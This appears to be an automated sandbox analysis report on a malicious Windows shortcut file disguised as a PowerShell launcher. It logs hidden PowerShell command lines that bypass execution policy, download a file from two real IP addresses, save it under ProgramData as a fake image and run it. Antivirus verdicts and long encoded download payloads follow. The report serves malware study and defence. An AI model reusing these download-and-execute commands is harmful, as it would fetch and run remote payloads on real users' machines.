file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	"C:\Windows\system32\cmd.exe" /c start C:\ProgramData\Google1.jpeg
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg'
cmdline	"C:\Windows\system32\cmd.exe" /c start C:\ProgramData\Google.jpeg
cmdline	powershell.exe -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg'
cmdline	powershell.exe -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg'

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Nov. 18, 2021, 1:37 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg' filepath: powershell.exe	1	1	0
ShellExecuteExW Nov. 18, 2021, 1:37 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg' filepath: powershell.exe	1	1	0

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Kaspersky	HEUR:Trojan-Downloader.Script.Generic
McAfee-GW-Edition	BehavesLike.HTML.CryptedGen.lg
Ikarus	Win32.Outbreak

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 18, 2021, 1:45 p.m.	process_identifier: 2248 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000002770000 process_handle: 0xffffffffffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 18, 2021, 1:45 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (6 events)

Data received	6<>A>>A7G9DD?DHFC:?GH:DCFECID=:7><8C787G7?;A6?8:><86CC@IC=7?AI?=E=6B;AB7DH7A6=>IF?<6=6E?BE9@:7I<88>=EC:I@<H>F@A;><9I9A7AB:7AEF<H>;9<I?FH>@;DA=IH9C9GC8I>7@H9GH:68;>=H<EG;BH@8;@7G99;GG7ED;HFBHC>I8;C7<G<<I>B6BD7G;7@HHF>EE76@;?H?9;GCA9CF@8B6E786<>><@>;I?7H6E8AC7>=A:?8HAF9B7<BI:7E>6<@BD>@I9:?I>67;6C;;E8?G88=AAA?9;8@76:>IB>:FGE>F<7IAA;EA7=CCH;<<=DF989C@B<;6676>;E?C96G?;FEB<7AF8H69C;?C8>=B6;;D?;C=8AG9DA866>ED=I8<C8FADH87:=CH::;EE?B;>6BB<:B>CABF=G7@;HB>G@9G7<6@F<H;F?CIGFF=8C9DC@AGF<FBCEH<76>EAHH:9@68@DI=CB=DFA<A;<F?DFH7@IEBI7B8HHEFGG:;7DFF?DFGABFHDCGC;G>AAAD8?7:<BI>=@=A?8I?@>H67CBC<G6;AB6C=H>>IBA8F9EG8:GEDG77HCAA=H:96IFC??FG6BI9G?>>D>E?A77;>BA7D;AB=B;D<IA=BI@:8HID68CH>HHF6:F=@IH@=;@D@FDA?;@DB7GB@DB@A98G6EIB<6A<=7CH=DB>@HD:=E:DDG@;CAEGDDF?I8?>@?=G:=6@<@H9<6C>B=CB78H6I:B8H8@>I7GI@:E=H?H=7ED:7@7=FGHDEGAE::?E7DC:6IGAEGHB=:9I?<<HECC@ADHIH<HG9I7@<@AB:BBCAG>>B>B>;DD89BG:>6B>766<E=CA:BAB68=@H:7AAF=BAEA87=E;B>H9>A9CGE@A?>ID=A6<=H8?F@D?<E@9D>H7FI96BFEC8G:C<B;?H=;A=;E>HE7BG>B668;D6<CB6CEB;C=DG:H<<7@>8>CBF@?D::A>H>@GGII:A=E69>9IC9IBAHF=8G=6AG?<C>D@<>68I?7EA;<:9=DA8BFI;FD87:;88:G=9FF@@=?7>9B:<:G<99=8BH@6B8H=8=A=7B;F;BDE=I;C7EB6IC7F=ABIAG>I8@G:;7??7?9=A6D=?>ED<AH>8D@<7<G87:C8=GIF;>:IB>8A=8E76@>=<6?A=6?IA;D<@G>@D>H>9>GI6:@G8H>B:;98BIF=7=G:@AFG8D;H@9E=G6H6GD8976E;86H8D<D>8<:;BD?>?9?HC>EG:9FH67C6A67HI>G?6CD<HBD@7CH:BGE7FGF6GIIEFAF9CE@6=>8H<;F<7:F;=>H?9D@:<CFBEHA9I9A7<F<;96AGI>FBA6FI7G6GHIE?EDD;<:ID:>8E6>C=FI:>C;G98?:8=EB<;AD:68GC:<CI?A?GBH@E>?H7I?F6:6D7B7?BFH9@<F=>F=7A<FBI7F999I9DF6??7=IC=G:=EF;<@H<AF:H>9I97CI??B=;;HB@FHF>BI=H9?:=B=C:H:H;9HA8<;A>G<A77>E;AH9:8D?6<>G7IEE9:HA8A9E:7=6>D:H?>A>G9FE??BD=7FF;7ICGBI:CD<97FID6=G=9::>?8:;G@96DDH?7;?6=BA:I;6@>7=<DB;<7G<9BB=;;;I7@A6?>CC7DA6?<?F>H=<C967B<?CE:=I==H8C7DE66=7A8A8BEGD=<DIAI>AH<<?@=BFD6;I=CH:@=??D<?E867F9GBCA9H:ID>A98:>:=H6D:B8G7=@CIHA8@?6E;:9AE?<7><DE7=@;CD=HD<FG;H9;7GBG68@FBA@A=;<D:ICA8;;:?BB8>DDIGGFC>:B<=@I86HF?>@D68==I<GC=8H8@8A@97;I@>GH89EID<ED8:IFCI@DCAA@BC76B:IHCH<:9GD>B8G;E>HI96E866F><:>AC=7IBG;>99@D:6>DB7F@666>9;;;GI>6FA?CCDF=G;I>BBH><?E@9A@=8=BG>D7=:9GI6@86>>96=@::6:?9:FB?<G@DHGBH69H6?G8@IHC?H9>I>8C7GFFEF=G=?;C:>7FAG@:FF7DC?;B8>7>7@A<<D?7=CHI;CI689<:???C=IE9<;=6HGIB?=>ID=ID8<;8FB68=I7976FC<66;8FC6C8ADDHC8D76<6AA;GCAI>C<HE6:=?H>AFA>G:<86<?;C?>AHD@8BC;877;:@@F>8C>>>:DH6II@?;G7?IF7E=@EAE?69BG>;H89CE7A>H;8D8<G6IG89;7D6H>6=A;:<<6C@BEGA>;9ADAIC97HF?I<:9<8D6G>G9G<C8?;EC>7HEE?<88<BH:9CC=>D77:;H<>8:DAFFEHGBG7DBH9C7GD7C=:6<6@9D=9AA:BAB;7AI?I@F?:<=6ACB<><G?DA66EHDCB;>96HGAI88EA@;H>@:67@DDB7=B9A9>:>I?8IAE?H8F=I@:;<H>?AD>C;9:G?;D@<8?7D>F8?7;DA?DDA9G@E=CA@=@DII:H?<@@;C<D=6=F>==I8<DBA>:G8CC?H@CCEAIC7ACBFA77@=A:=FGE7FBD9@:FH??;H6HFF9B;;B?EHC7?H>DC?E=6D6EI;;HCB7<>I8F;8<;HG<BC>?H@@I8CH>CCBG9AC6DD<AG:B?>BEIG6C86F<8@FA=;9DEEB;HHB;66;=6E?H?B6I@ACE<CFC?GAH:6686@I9H;CE9@BEI=7=?HH8BB;?=<B;6GC=I;7>8=>C<@GD:FADHEABDFB9=;DF@=H7DDB<AE;7;BD9;?B<HDA8;?E?@6CD6:D:G<@7D7F?@>GAF8H7F>C:7?DC>;=:?=;>F>;>98;><7@>B@DAGD@6:A=6BGB=BC@8AHG<G;6FD>AIH8:FD6IDEB<;9C<;7<I@G8<G8AIE;IH6II>?FFH:=9GCF8G6G@7:CGFI7BH:A?F;<;C7GIH=>B6IDBHHF>6E@HC7H6FGI?<I8=C><GD9HB<8AGG:9ED=7D:?6<?EF?BH<EF@:>D<:F??6IC@8B?68CE=BA8=9BAGAE6>:DI6DF@CB:G:6H87=E>6>A<H9<EF8?H6I:CFE;>E>FAA8?;B7:AH79;>:FHE9H@H@9H867?I>GID=78F:HH9C6;B=CBGC66E6EI8F9;GBAF7:;DI;E<FE@:7<EDD=A9GD8F;<F9D><GD7F;97:HD7<67<9@H86G<E8@:?6<@@>B@GH?;9@8C<7:B?G9EGD@I=F=?6;>9GE@A;6:7HHG7A7>7BH@@C;87ID@>?DD:;IC=B7F9I<CH9F:8>I;<E6A<<8GDGH8H;=EBBI=6E7DB?7?GC:B?9FFD77B=H<877DHA7IG<@I:BDIICH<C?>=FGA@?7FCHHI8B9IAAGE<E;9G:EE<6<HACE=7F<8E>BDDID>@?BCFE9@H8@EDGGCA>A@BH;=:@B9=C6IG9FG>DF>FB869>;@B=D
Data received	G<I:A9EHB9IHF>G>@E6H@D>C?C?7?B7>AI=<9D869BD<=@H8==DEH6I;G;7:;@G7<B>7;?@IF=<<G>@?H>EI6F@8?H@GGH??IAB?9D?HCHD:?B9F?GA;AB9@DBA6H9CHH@ADD=DFG<B:7=CBAHHCFGBE9<;<E699HIE6>A7G=GGIE88797HH:H>FD9<C@9::;<@@>C=9H<=:>>9>7G<CB=DDBGE;?CDE:?H=H@8ICBFG6A:=6;7;GF:CF?EE6GAG?A8DF6G;E?<>:;8<6:989FG=I67H=7DI?ED=CIBGIDI<G>F>86;:;:I9;B8:IA7=986A>9C<;@6G<:BCB>=C<9@?B<6E>6B7EFH@G6D>:C>;BI@;IFIEI>@G>?H@?;A6>FB>>B9D89;?>C?86F9DCI;@;E8CBG;F>DFBHFIFEA:;G8D?8>7H7<D6:HFDA6<E=8H>AG?@B9IIAF?=>C@HBB???GEH:E@7H6DB8FGGHCF6I@=6<;8=;FA@9;<;7=@I79I68;>779A;?G6@7<@=;<;F<96A9:@DH;;=<CBG9F:87<B999I>8;GA:6H9;7D>E6D:9=GCC<=7@G=>ACACA<A?FDHC>:F?CGB;9=CCGBA>=8EB966FE7?F9I>>B<F7>=78=?HFD?>E8H@86E6I7=A79>CH<;:=G8CG96B6I<;I9FF=C7CC>?FF<6EA98@;D?DC>?@IG7IA7=C<:B8DAE??;=6HF@E9<FG>66BECFHI6;F<:=6:A8F7D88?H;;6DFG>8@=AB98GC>GF=EC>H76:669:IFF7C8@D7D8@9:BB=><?<6FB76CGB7IDH<D6D:G=AFEFI7I<E;EEG@??G;9D9>:I;H;I<A>=C?<E@C97FG6H9B:E;=69<G7C76;E@F?@?6=?GE;H;:==;AGB6G>IH7B=B66@<<678=BAHD;IA:B::>FAG<B8>;E@7=>6IGF@6;H@7>A<B;H;?CCDEHFG>AHHI6BC@9;GB?=HB==BG8AI6D?78;GFA<?7?CH>@=::=GAEE87><HG8:I:99GFA:EH8B;;<@>>:8>EA?D7H7BH;7?C76DCG8:G=:IB6?B=FDH=EF8I>ABH:EFCC:BHH:HB>:;A?DFF:<AE;>A;>7E=77@B;E7=<C6GI;B:>E9@8;7;;?9FF7C9CDH@C6=:<::7CFA<EE96BEG8:F88AGB:B=BDI@H<F77>HE68HB===E9D=<EF8BHB<9IGH?G@H;GDD:F@C@HA@@G7FB;AA@>:F:<;ADI@G<9;>G6I=@8==GBD;GHB<BH6:>9C>AIC9=>==H<I8?C96IACFEG:8HBI>>;G;EGCE<<E;F@B9E>7;9>:;:C;CHIH7BGEDFFFG6FD>EED9@FI>HDIH?86G8H>:;6=D?6>?6<8;F@G=E89B@6@CF:6AFEFA>DEHEA988?6@C8A=HAI::888<HIAID66:E78;=>8I8<IHH77F97HG=:?DCBC;H7I>>CB>C;<=7FC6@?AE<GB:B6@IB7F7=:FF>:F8E7:AA8H@6>;G?>79;9BF>6=?==E?F:=D9AB7786<E=??G:C8>=@AC8<:F7:?<H=86=?8A66<<D?BH6:?:>>GAA?<C<?@@C<87?E;IF:=9;=DIE9:6:FFAF<996876GAIBC>=?C9EAFGA77<6;;GA<9E<887?D>I<<9II<I=C?G6BD6B7B7C:H=;?>8;<>GH<F>F7<IB>=?GI9;I>9E>DFDG7E7;<=C6BHI?FA6A??D9A=9=D@C78I8C6>C9>>F>D@F?;D::96G@GD67>6F>DG9??7CG;6;>8=BI?DC?>@DBD;E;96=7??=F6>=<=?B8F8=E<=F=G?6H?8F=D6@EADG6ABC>7@AHE:?9<;<8D9E@F>I<B?GBA<<G8F?I;7F=;BH9EGA:8AIF:FB8?H@==>:>?8?CI?G<8@@G7G@D=I;9A8;GH79<FI<AA6:797FCD8>F?=GCF:;:F9B6GI797AB8AE;<GC=@8I<CEIBED7:GGA88EF6CCH8F?EFBBHA=BDCB@@?DFG?;G97=8A>BA96:<F:7BD@HGGH=6?:?E:H;C8:E:G9<7;H9D>=G6FGB=AA?E>;<;H@8@986=:A@D;:8I6I9GC7:EC<<<A7IG;FF?:?BH7@7899HA;FBCEF8H;AF:<6679AH:A79??>H88EBH7>B>?:F=F>>?8GD?HH@H;>I:FIBB9=77EDC>H:7I7@;EC;=F;AF<G:9G>A@C<H6>8>EC>G>7:<FCC<AE77=C@8F=G97BH876:?8>>A<6>FIIE@9BGD=<@:C=H;HA798H@<=7E=9@@7DHFCH?GB>6HF@F?@H;<>GB>7EAGEGF@CI98GB=6EE:;=7CBAIB9:9F=H>>F7688@>?I77FB7BEI?G:6F797;E8:IHDEE66?F=G@@676B7D:>?I7I:@G<ADGB:<C7AI8G:@;FIDC:?A=<@ADI98A;GCAEB7=IAB@<C?6@@IE?8A9@EFB;;88B?B::@;7=AIGI6:9BDCEC?C=H7IIC:A9;>79FEHBGBFI9:@EFAGE7:B96E9FBF:?@=IGE?GG8<86A>6ABC7DE;EGI:I@<GDFI?@HC9BFFGE<EI=;D7??I9E?C966E@<:>GH;>9HF;D@=;GB7ACB8=8C76@:<;?F@EFE7BCH=EA67?G8?C@:@77G9DEBB:87??AGE7<?HH8BD?;@9C6@@>F8=A:BI:8<=F7AC?6:8D<=D:=8D:A;8?CBIDD786E@AC=;?7G:799FD68E?8:@A<A:?6=EH8FBBA?>FG8B=B78GHD=F9?H?FHB6CACAGHI>E==E<B@GA?GDHAA=;F6?A8GE:9F?DF@B69D8A:C7:G<=;;EE<>G8?B6?A:6B7@CCHDA88BC=C@>>A=HI79I86<GH6<GH>H
Data received	LGGMHIKEFEJNMDNLEABM@CLKFPPM?AA?ODFNQPHDIF?HLHHNID@FCHNQ??AFDQG@GB?OHBNEAHDNJM?NGADFQAOGDN@QNDMGPECD>FLICFI>?GC>ODGMNHBLCF>Q?PDNIFA?ELLLIHANBPQHHLGNDEN@IQPDBH>FHA>>AHGA@FBJONCMJQKBCNDJ@K?QCNIBDHOINNKDKGMKMELBAPKICNKC@?HADFCLPNNH>CKP@?NJPEJ>KQLDJIGCAINPOMGM@KP>BLDDEF@BEHFP@POMOGGKAAPN>G?>DPJ>NQBPI>JCAJON@>DENC@LNNNFAHF?ECEC@H>OA>QKDOBLGCH?KFKLKHOO>M@?MNHCNQBBAQJMMIBQFNQIFBIGHBPFG@>AAHN>>QEQHK?LLBKDOQJLE?MGL@LK?NKEKINQDLMHP@INHQJAKLMOLONJ@>L>DANKJKIE>LA@?LBNMC?MGLQLQ>QBBKOIEKDL>MNMNLH>ALIMNO?EKOMPNNK?>QJDGEGQKKKPJEQK>OBIHANKCKJDI?LMDAOIBKPOCKOHCQ?JBPHMPKIHNOKFKMAPLCMDDFODIJMQOBDG?PFNOBCE?OJGBFQNIGLQFHGEEOHJOCQBOPPHKLBJJMPA@F?C@DOFBGBCLPQ>@PJLKQ?PO?OBFNN?KNNQQ@HPIJMHK?M?CEFDAPOODDBDGOKHAAHQ?CKHG??MLCQNKHK>KPQKNGLF?BI>NQFL>@HAGJQPBFKFBJLGAIAPNMILLCPBPFLC>OHMQ>PFDHP?EPN>AQPOBHJ?FLJ@NMI>OBA@EPNNGAJOKLOGI?IGL@BDGGOOJFAOPPGOCMPND>QODHLIIACIO>LPMEJPDMGCGKNAIKODMEPBOJAGPKGD?P?KICQOH@@M?JEQ>J>O?>JCPMO?FPMFOCEQCAKINDQOPCBGLL>A@?M?I?DMOHNGGAOLJENILPAHILG>@?FPP@KDDBENA>LFJN>PIDLMPJPKJPFK?EM@QBO@NMEQFN@PPKGGB>JQFHKFA?H>IF>L?DMJ?GKALPFEGF>C?EMIM>?@GAAP>BDANCJKJ@>GMKIBIMONMFO@QQQHCE@AJAI?HEO?JNB?AML>DNLDMFJBMP?JQJKOIK>JQHMCGDNKPPQKEBIIMNI?HG?CHDAC@@HFP?OJOFP@QQM>NLQ?HBNBNHOHJGAKA>FKIFHDLDMK>LNQPPJDNN>BCICIAMD?JDOOKIAHJ>CPPOQE?BMAILDCBKJNMDIIEGJ@EO@E@EQFNMFGLKFGCPGAP>>@>EMFLGDP@N@IKJNJLKBCEKGJFPB?MPND>AAKINICGCEACCBNB?FL>F?ID>DGLBDQKHC@P?PAHH@@KFPAOC?MFAMCGJ@?OMF?MP>LGDMLBK?NQCNPEAD@?D?>NJFINEFHHNA@@QB@BQBGIMACK??EJ?KAIOELM@HNMFINCNPPHNG@CLAPEO?DCMPFOBHOHJEFD@?OKLJQIO?>QBEHBADGIOJNIL>DGI@>EIBKDDN@QJDDCFJB>AB>DB>NEM@IF?P@LACQPPFKPKAFDGAGQIBOH?GFQLGN@>C?ABDDMH?HFKEGBAOFJIEFIOPAJKB@EDJ?GK>FCNGD>JFB@@HKEFJOQIFLGJC?A?>GMAA@OEONP@POAKQBOGBHGHBCLI??PANHIGGOHFIOIG@?GHLPNDCIFMIJLE@EDGOFLHCANNE?BJCDDOJFGC?J>JOPGC?NQNINDKFL@HJ>CFEGP@EP>CEFDMKNMDFDIHG?EQD?FEMLFE>LO>B?GHGDNHLQNCFQIMG@CAKKDBLCQGE>HDPBLNBAFFA>DKJHJPJA>>BIH@EIF>B@EFA?E???PFQGABB?HE@NBJCL@HONEA@@@LFI?HEPDLCNGNABHH>J?OEPJJBL@MFGGFKIGNAOEBHNAOEQFIOHBEJMENOGJFELDEKAQIOKO@ALOBGQFE@NIIBHMC?>?@F@GCBKBOFLCMQJLECOB?DCQ@G>OIQFIQM?DBKHPH?KH?PIK@FQ@EKLIFEOFDHFJ>GIEK?DOGE?JPABN>?AOCJQLAQH>QPL>CFQNKIGCKLOMG?AEDDMKKPMAOFNI>>PMD>ND@>IBLBQ?QMEKFCFMJLEHKCAKKLQONPBKPBEKFEQNFPGODA>BQPMNC@N@GQNHF?D>BJ?NQCBIJAMIEBAPNJD>?NLCOQ?E@>CJFHF>MQIOEGP>GC>KKFK>PFMLCA?JB>OJHGCNCHI@IPM@LQMCHBD?OK>HILCEFAEO>G@D@HNM@QJCHO?DNCEGLHICGNCBLKJOI?BAFNCPLGGCHLGEEG?JIAMFJJJIPMLE@JLHKBLOAECPMQKHO?MJAQOMF@KBNMP@ELLLPLQ>MPA@QQHHC?>GLPEQIQHGFBOBDEK@GJHK@O>CLICKEOEFHQLDBKN?NQMFIBNDNPFQM?J@HOCF>KLKMFPAIIBNPOPDCO?K>?KJCBMQJJH?KIEIBHLJED@?MKQ>@QGCGMOALMKMLPPBAH?IDJ?NJQAPFCQN@C>H>OOIBNPINQJJPQOIIMM?@QENOJAGJDAHAJ@NN>FIMLKMDQA?KFKEHKO?NH?AAMMAFDJJDG?CLL@FQN@EBOPN@@NNNHKQ?INE@MNGHN?JQQE?@AKIIQFPOLHMGDMHFAAJEKMO?L@MJML?FMJJJQN?ANJMMK?@?KPI?PK?AQIL>ICPLOQLE@OEPM>>INAKNBFNMEKJDBO>OIHNLNKLQIKK?FCOOOAAKD>B>PHDIOIA?L?AI>?HIOGQLL@FO?ENLAHPGHHHBKOEDILGMLFOQOLC?LCGBNGA>PGP>IGLP@FB?O?O>PAAMLLKEOCBNMECHHD@MKPBIQDBOKFOAIPKMCEM>E?GJFGNPOKKNODDCC??FL@OHA??FNDCJIGB>JCGLAI@QLH>Q?MENOLDQCENEB@K>LHEJBJLBGOMGND@CL?AANEJDHQ>IPBAIGGAEKMQCMACNODQLNEG@LCNHCHBEIPF?>J@ELC@M>BJH@LMP@QGBL@ANGDFKJFNNKAHJ>BKJ?P@CKKLEPLIFICIN>CJKJHJL@AKKQ>>AQFQLOKDDLAQIH?GPMKFAN@QKA?QI@FPGCKIAINHOIFABNOEF>JNINHJE?NP?OKMHHMLJHOM@BDCFNAPE?HLLILH>>QPPJCBHAOLJKL@MDLNNHGBDGP@QMBIBINPKBMDBKCMHOLJEHLCCKGIK?QMAONNKECLCJPIHFBP>IJIMN>@?K?MFEHEDKKDKGAOMAJQHKGG@QL@AB?@>KCN?CG>BCPMC@GBFFF@JCABCDQAKD@AE??PMJGLDAB>DKCGH?OJEODKAJF@HCBMPEQ?H@JQI>KCP?D>IGQNPFN>LEBQ@KLNQCC@FBGI@DMHIJC?GKOFC?@ALDCNIBB@GPBEPPODKCGALKL@K@EN@GMFHLGCBLLPNB?JN>JBDCJQIBNBDABFGNJDGGI@EPIDBACMGIOJI?GDHFKCNAIPGOCOKKDBF>N
Data received	C>OIPA@CFO@NB>DLH?H>I?CPQEP?JEDGKDO>HEAI>AJCOAFNJIA?BG?Q@LJO>KDNA@HJABCJPJQGLCPOFM@DGNLMODL?BDI@>>?PEIGNH>LJCICPMBPG>LEQDIHHGD@>JKILEECQBOPLCD@HO@DKJCP@INJGCGMNHIBAQKNHQKLIQGNOIQMDGFFK>AC>@PQPKNOJ?LKBK>KAIINJPDQCQLKEQPFO@QA>AKOQO?AEKLGBKEPHPQAGBH@PGFKOQBP@PAKKKMG@O?OJHD?MMFMNAG?DDEDMEPCPGHHEF?EHB?JGA?EDF>PG>BALNI@FCBCICDIGNDBO>JCCDCB>PLLFD>KCEK?FGB?>LOEPHLFJKEQ>B>KQQ>F>>@EO?INCFDKFGOFDFGKDQMFI?@QFJLQJNMKKPDPMOIJAPDKPQHLAPPEICJ?KA>GNEIFH>HDDBAMFENI??AN@MB>ABCJGFCEOHLNHLAGHQHQCHEEOLLP>PPJMFL>KEIG@PJBQBNBQCEC?CCHCCPA?MFKOQMNMFNNELLKHGA>AOBBQDNCO@EA@OHDJ@@AHAIN?JENBEAANGCCQENCFNADGFBJEIIMBM>>KKONLKJBO>?OPGKDI@QLAKK>HINLFHJCAQJ@CB@KM>NQ>JJOI>PHIEHOJ?OM??IPKBJOADL>KOLQ@KHB@QBLENGCFILKJQOBPPFFHDLDEK>HCELLFL?J@O@CDKDLC>A@ICLKQPBDKDKKCH@?KDIHNBAHKOHBJPKKMOHGQ@ONNNCMABL>OPBOFHOOB?N>EIFI?@OKLI?HG?LM>MAJB@QK?MQFCPLFNEJIIDQFGKDKQLF@@???AMKC?KAGKDQKOGQJEHQIQB?MBE@?PANNIM>EGNMNQLCFKEJCF@?KHNH?FC@>CMQG??HP@FQGEBBBEEOICDMQKQPNEEJHICNOAADQFQHQCOEN>PNEPDDGAF?EOOAPFKHBKHBMJ?PBJO@JFBP@NPGL@BMQJECKGCGOB?JQCQOMGFAKC>C@FBP?CEOGLEQJKOKMM>CJEM@BM?IEHO?BH>HAC@MDI?K>GGCIO@KMQMAEJFLKPKOKI?LKLIBDGHAJFOK>CI?PKEMFELCOLKBHFF?@LJB@CLBKFE@HANEFDQEI?PBNFK@BOEKKH?Q>>OHNMF>DKEADMANAHBGM>>MJJAEKQN@JMGBMJDIDNQ@CBAJICCAE@NCEBHQAL>E?PHFCJEDDG?FNPGILB>HO@MJPJDO?CANPAJHAQEQIFJOF??MFPDOOPOHFALN@>>LOGGIBPN@BBG>HPHGNH>>NFBAKKPLM?CMHKOEQPDQQIFCIF>NAJDOGLQIH?EEKKMO@F>@KCOIDD>BPQEM>FCCIHQDP@KEQPHOONQKOKBCHNIDQFMD@KIL@?P>FPIMJPFIBF@A?QAAFMLKOPFH?PHJ>FGPQJONEOJBNIJJBKFI>PGJO?FOL@PNKN>MB>
Data received	HEF@AAKC@?BNKJBONAK?CF@BHKH?EMJ@?G@IJP@B>LMABABNN?D>EJINIQPCQMAMGFFACFCCEHIOPPOGQ>>JBLAC>DDJK>IEQCCAFIEANMQKOOJJBPNDNJMACN@?EGEKE>QCN?IDBMFOACAJGNOGKOGQLMGFNJPFQOQDDON@QJOMF>EPPOBM@OPPKDGHDEKLEPEK>B?B>BODAOPFOE>JCAMAH?GH@EEQGBL>EJPIGQ>?JH?KP@>PGEAPL?PDB@OLQQHIO?JCG>MBJ?FLQHGIMOOQMP?>GJFJ?CPEPC?IBPFNPIHALKPQEN>>PJEMINCDQEAABM@@GFF@P>@MOKHHILIQNN>D@JFGADNH?JINANCHFDQO@NEFODB@KDMNDNLEFFLEEK?@MBPIMD@E>BNA?HFA??NMP?FPFGIFLOOIBMLP>N?JAMPOP>EDMGJPPHME@HJI@MGELKAQOFILCQPFCGDQEPQ@IGHMMQCOP>>IPLPQIQENNCQNBGQONMNILBN@@>EOHGFJGCCEFNPAJD?F@LPK@L@BKDPOPQNMHKPBG>GGFCNCMHA?KGCDLGDQKALM??C@BLN?ABJ?EHEEAAQ@QDG@>OEMKACHJAEE@NOPGKQF?QQGKPHCDQLGHQICFPI>>INBBPJHM?OODHPLCC@JAKBHBNAKCA@>IKCJ@LNFPI?IBP?ME>JPND?DJHFOBJKKDMHFKBJELOF>B@@LE?CNDOFDQOANFAMBCBPBIADEJLDNFHDJKAFDADMLMCEB?F>PH@KDLKGFDJDM?>K>OEHIJED?G>MEMOBICID?PGMKGC?GPQIN?I?>MOMLHJPAP?>ME@B@OKCEGHFDMGIFOKLO@@?CDACKFKJAHB@@KGGJHOIJBDLBLIPCFHB?EKEBMJAJCMMBD@NID@FE@?>KNLNMJNG>MJ@HO@L>?E?@L>CM?MEEJAKE@IJKDGHLDNEKPOJHJOGBAA@>LQJFDCNBINHFKANDCEQEMDHEPOCM>FNKKINNIKIQOM@GO@LLNQ?LFECOECFNE??LQKCEK?EEJ>F@@>ANKC@D>FBAKKHKKFJHJIJBPQC@KHIKDO>NH@KADNCBOJJKMLKBQFABDGHFIGG?GJPQK@GEOMKFDA?GAFML@HFGIIKPFEGIOLN@@A>NNNPNJNMAMLKOE?F@?OQLACEBP?BCOFMJEQIONOABP@BLCHBPBQM>FDCJHOEEFOPCKB>MNLEO>P?MLQHOECCP?@CKIOPQQ@O?QPGHNHDHB@LDAFN>@H@AJC?CPMN?B?GQEGDQJI@I@DPO>FE?JKIN?GPGCQ>PPGAPDPLEBMHCGD?DNJMGPAQEHDEQNNAJ?EAMPC?EBIIGEDGGME?APFM@C>A?QHH@IGM@ILLIAPDFBPQBGBBMHG>OGOBDHEII>ML?MNHPA@DMIPLOBFKLELIA>OIFJDGED?BMMAOK?OGNDQO@@LCOLA>LDPCJHBJIHNDOCOQJB>NKHF?CDIGJMDPBQLGMH@DPQE@NNJGPPKAIOGHLMPHQKLIJOHNQMQHLQQBJ?OLOOJQQBPFEGKL?BNJ?LIFEALGIIAQGF?BHQKNCAHJICFJG>OGKPA>FFPOPQNFCCBO?H?INDMDQGGKDC@?BJ>H?>JF@KIGBBJHO?AOAGC?L?GLOC>MGMKOPEC?>GMDBAOQM>EFPD>HBCOHJFM?DODEIEQFOGAFM@NAECOCJ>K@O?M>Q@OFKQM?MBJPI?Q?MQ@QFBAPH>O@HFAKK@NFFK>PMALGJJKLPCKDMQFFNFN@JFAPID?FHINOM@BIOJPLAD?GQLDODOJOC>L@AO>FDKJQNDCJ?>JJODDJFG?FOGGFHK@C@NM?>KNHAHQ>DAII?QQPBBJL?JFDJQMPAMQF@JPGFQNDC?DQAKHAJIPNFPDIL@HHHNE?FFNG>FDCIBIOGHMCMAEIFKCCP@DJHFALQDOO@KLP@LL?P>KGCFIEHHMBNEQGJHK>CELMFGHMMCLJOCEB?GEA@MBBKBQ>LPFCDCMQ?G>KE@@BHPIQ@GOAKQ@NN@N>MG>NC>HGBIKEPMLBLECKHKQPPQL?FIPOPMIBPFQMQPLDOO@CNFM@HNOJGEAGG@G@CDOH>IM>NNOAPLJADGMJ?PPHGPQO>I?>NJAILFPJ@CNJLCOQ?@EJKDMACAFAEF@J@CPN@IPHJOLFN@MMNOOJKM>II?AE@M>?NCF>OEPHEHEAJLPBI>QG@AMFLGFIIFIBKF?HBHH>H?GLOIO@QBGLD?JIEMKIID>NIQCHLGCDO@FEEDJJKEG>?EJNN>I@J?JILDCKAJNHP>AQIONIMBFNNMGN@PFDPBO>NDKMEK>OJDCOJOQD@GGNPGCBEQCDNJ?CKBMBAQC>NDPJNBKBHI@KPLEA>KDAKIQQCP>KLPMHBL>GHNANDJQGDDBJLBMOQE?>FJGKE?N?E>OPKOQKGQ?QBN@NM@QPCFCELK>JH>A>>JNLGELMGBH?DAO>BOPB@NNEMNADG@GDMKMDMHBAMH>HPGHP?>HKJLN>H?ODPCEDLI>A>@QJIILQ>FQ?KA>PFKIQLOBLO?MILKH@DJN?PH@@N@HGAAAIOA@HNBB?DNNCJKBLDBQGKGJJH?MPOON?MEQF@FQNAHH?CJPLQJJCF@IQF@AID?OLLKQOEIFNPNOO@BNECDPFBA?LF